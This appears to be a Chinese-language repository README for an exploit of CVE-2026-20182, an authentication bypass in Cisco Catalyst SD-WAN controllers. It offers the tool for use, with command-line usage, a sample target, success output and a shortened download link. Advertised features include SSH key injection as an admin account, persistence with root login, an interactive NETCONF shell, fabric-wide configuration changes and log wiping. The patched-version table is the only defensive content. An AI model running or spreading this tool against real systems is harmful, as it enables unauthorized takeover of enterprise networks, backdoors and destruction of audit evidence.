fangbarristerbar/CVE-2026-20182-POC

## CVE-2026-20182 Cisco Catalyst SD-WAN Controller / Manager 身份验证绕过 **免责声明** 此漏洞利用仅适用于经过明确书面授权的系统上的授权红队行动、渗透测试和安全研究。任何未经授权的使用都是非法的，并受到严格禁止。使用时请自行承担风险。 ### 概述 针对 CVE-2026-20182 的漏洞利用。绕过 Cisco Catalyst SD-WAN Controller 和 Manager 上 vdaemon 服务 (UDP/12346) 中的对等身份验证。授予未经身份验证的远程访问权限，作为高权限 `vmanage-admin` 内部账户。实现完整的 NETCONF 控制平面访问，并支持注入 SSH 密钥以进行长期访问。 ### 漏洞利用功能 - 通过格式错误的 DTLS 对等握手绕过身份验证 - 通过 `MSG_VMANAGE_TO_PEER` (类型 14) 注入 SSH 公钥 - 以 vmanage-admin 身份建立 NETCONF 会话 (TCP/830) - 可选的持久化和最小化日志清理 **功能特性：** - 整个 Fabric 范围内的配置操纵 - 策略 / OMP / VPN 更改 - 持久化 SSH 访问 - 交互式 NETCONF shell **受影响版本** 在以下列出的修复版本之前，所有 Cisco Catalyst SD-WAN Controller / Manager 版本均受此漏洞影响： | 版本 | 修复版本(s) | |-------------|-----------------------------------| | < 20.9 | 迁移至受支持的修复版本 | | 20.9 | 20.9.9.1 | | 20.10 | 20.12.7.1 | | 20.11 | 20.12.7.1 | | 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 | | 20.13 | 20.15.5.2 | | 20.14 | 20.15.5.2 | | 20.15 | 20.15.4.4 / 20.15.5.2 | | 20.16 | 20.18.2.2 | | 20.18 | 20.18.2.2 | | 26.1.1 | 26.1.1.1 | ### 用法 ``` python3 cve-2026-20182.py -t --key-file id_rsa.pub [--port 12346] [--netconf] ``` **选项：** - `-t, --target` – Controller/Manager IP 地址或主机名 - `--key-file` – 要注入的公钥路径（默认：自动生成） - `--persist` – 启用完全持久化（SSH + root 登录切换） - `--cmd` – 一次性 NETCONF 命令 (XML) - `--interactive` – 进入交互式 NETCONF shell - `--clean` – 注入后进行最小化日志擦除 示例： ``` python3 cve-2026-20182.py -t 192.168.100.10 --key-file mykey.pub --persist ``` 成功运行显示： ``` [+] Peering handshake bypass successful [+] Injected SSH key as vmanage-admin [+] NETCONF session established (session-id: 42) ``` **漏洞利用 - [链接](https://tinyurl.com/4suvc9tt)** 已在 20.12.6.2 和 20.15.4.4 版本上测试成功。

标签：Catalyst, CISA项目, Cisco, Cisco漏洞, CVE-2026-20182, DTLS, EXP, NETCONF, SD-WAN, SSH密钥注入, UDP协议, vdaemon, vmanage-admin, 内存分配, 协议分析, 后门, 子域名变形, 控制面访问, 权限提升, 网络安全, 认证绕过, 逆向工具, 隐私保护, 高成功利用